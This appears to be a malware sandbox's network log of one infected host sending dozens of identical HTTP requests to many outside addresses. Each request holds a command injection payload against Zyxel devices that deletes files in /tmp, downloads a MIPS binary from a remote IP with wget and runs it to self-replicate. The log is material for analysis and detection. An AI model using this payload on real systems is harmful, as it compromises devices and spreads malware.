                              Mar 31, 2024 08:42:11.412584066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8863192.168.2.1353656188.164.249.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412637949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8864192.168.2.1348374171.179.52.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412683964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8865192.168.2.13437465.230.241.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412720919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8866192.168.2.135203619.204.70.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412764072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8867192.168.2.1342190116.175.13.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412798882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8868192.168.2.135922478.0.67.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412836075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8869192.168.2.1344970148.177.216.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412878990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8870192.168.2.1354286193.35.129.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412899017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8871192.168.2.1342750168.66.109.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412931919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8872192.168.2.1347590121.96.83.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.412966013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8873192.168.2.1333302107.9.17.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413012028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8874192.168.2.1335934204.55.95.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413053036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8875192.168.2.1333504113.146.138.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413079023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8876192.168.2.134391865.235.203.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413105011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8877192.168.2.1346142148.77.141.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413146019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8878192.168.2.1334492124.21.178.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413176060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8879192.168.2.1333900192.66.249.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413207054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8880192.168.2.135072285.255.172.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413268089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8881192.168.2.135145474.29.161.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413301945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8882192.168.2.1341060179.89.247.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413353920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8883192.168.2.1345130174.163.195.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413408041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8884192.168.2.1333560128.46.222.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413433075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8885192.168.2.135665287.181.142.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413484097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8886192.168.2.133939637.208.12.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413523912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8887192.168.2.136091084.73.33.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413575888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8888192.168.2.133995298.36.207.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413625956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8889192.168.2.135039866.253.68.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413628101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8890192.168.2.133948078.244.223.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413707972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8891192.168.2.1342656164.103.22.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413758993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8892192.168.2.133494842.227.27.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413775921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8893192.168.2.135353097.185.104.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413815022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8894192.168.2.1359026196.186.43.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413868904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8895192.168.2.135888439.49.139.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413898945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8896192.168.2.1337866205.42.78.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413929939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8897192.168.2.1360060121.137.159.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.413971901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8898192.168.2.1351306154.31.47.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414019108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8899192.168.2.1344820181.72.227.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414053917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8900192.168.2.134029042.61.112.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414087057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8901192.168.2.133852058.228.88.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414118052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8902192.168.2.1340570165.116.35.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414153099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8903192.168.2.1335444113.32.89.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414184093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8904192.168.2.1341286160.120.228.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414241076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8905192.168.2.134987813.248.75.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414258957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8906192.168.2.1356012186.97.92.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:11.414298058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8907192.168.2.1354236204.87.206.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410068989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8908192.168.2.1338704197.98.196.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410125017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8909192.168.2.134535460.161.236.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410193920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8910192.168.2.1343590119.236.128.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410234928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8911192.168.2.1343494176.22.39.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410288095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8912192.168.2.1349468137.207.34.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410324097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8913192.168.2.1346586115.7.70.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410412073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8914192.168.2.1355004223.211.252.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:12.410461903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8915192.168.2.1345966176.238.0.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.442933083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8916192.168.2.134759882.58.155.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.442965984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8917192.168.2.133452084.78.40.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443033934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8918192.168.2.134723087.147.26.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443063021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8919192.168.2.13408409.162.95.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443113089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8920192.168.2.134939494.182.255.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443152905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8921192.168.2.1347794109.154.255.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443186998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8922192.168.2.13569585.155.101.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443242073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8923192.168.2.134581640.17.165.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443257093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8924192.168.2.1337802195.227.152.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443300962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8925192.168.2.1339062109.14.104.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443361998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8926192.168.2.1345288152.16.208.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443387032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8927192.168.2.135063451.161.38.188443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443414927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8928192.168.2.1335958151.176.135.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443443060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8929192.168.2.1350468174.62.219.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443499088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8930192.168.2.135675693.47.61.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:13.443519115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8931192.168.2.1349958168.34.217.131443
                              TimestampBytes transferredDirectionData
